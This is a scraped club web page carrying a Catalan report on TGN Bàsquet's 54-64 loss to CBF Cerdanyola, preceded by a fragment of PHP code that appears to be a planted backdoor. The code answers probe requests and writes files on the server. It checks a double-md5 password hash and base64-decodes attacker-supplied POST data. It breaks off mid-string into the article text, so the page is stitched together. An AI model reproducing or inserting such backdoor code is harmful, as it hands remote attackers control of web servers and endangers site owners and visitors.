function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet juga un partit històric i perd superat per l'encert del CBF Cerdanyola (54-64) - Tgn Bàsquet Club -

El TGN Bàsquet juga un partit històric i perd superat per l’encert del CBF Cerdanyola (54-64)

Updated: maig 15, 2021

El TGN Bàsquet ho ha donat tot en un partit on es jugava el passi directe a la final a vuit del Campionat d’Espanya de la Primera Divisió. El Cerdanyola ha estat molt encertat des de la línia de tres, en canvi les liles han hagut de deixar-se la pell per fer cistelles. Tot i les ganes i l’esforç que han demostrat no han aconseguit la victòria.

Ha estat un matx on ha destacat la qualitat en el joc de tots dos equips. El primer i el segon de la classificació competint,  amb molta pressió a sobre, per donar el millor d’elles mateixes i guanyar a qualsevol preu. Queda demostrat doncs que tant un equip com l’altre es mereixen anar a aquesta final a vuit.

En el primer període les liles han mantingut un ritme ofensiu alt, on han sabut convertir en cistella la gran majoria de jugades ofensives. Juntament amb la intensitat defensiva semblava que el TGN tenia el partit allà on el volia i l’actitud de les jugadores no deixava de créixer (17-19). El segon quart ha començat seguint la línia del primer fins que les rivals han decidit defensar en zona. Les del TGN han tingut més dificultats per trobar oportunitats d’anotar i és aquí on el marcador lila s’ha estancat durant els últims cinc minuts de la primera meitat, deixant  un resultat de 31-37.

Ha sigut al tercer quart quan la defensa en zona de les liles ha quedat desfeta per culpa de l’encert del Cerdanyola que ha fet tres triples consecutius. En aquest punt del partit les rivals han demostrat que són un equip interior poderós. Les d’en Neila han deixat d’anotar amb regularitat i han encaixat un parcial 10-18. A l’últim període les liles, tot i anar perdent 41-55, han tirat d’orgull, no han abaixat el cap i han fet un quart magnífic en el qual han escurçat distàncies fins a quedar-se només a 6 punts, quan faltaven quatre minuts per acabar el partit. Però finalment la remuntada no ha pogut ser i el Cerdanyola ja és a la final a vuit.

Recordem que és la primera derrota de les tarragonines després de guanyar quatre partits seguits, i que les jugadores venien d’una aturada de dues jornades sense competir. Ara no tot depenen d’elles per arribar a la sol·licitada final a vuit. Primer és necessari guanyar l’últim partit de la fase que és la setmana vinent a la pista del Safa Claror. I després el CB Roser hauria de perdre un dels dos partits que li queden per disputar.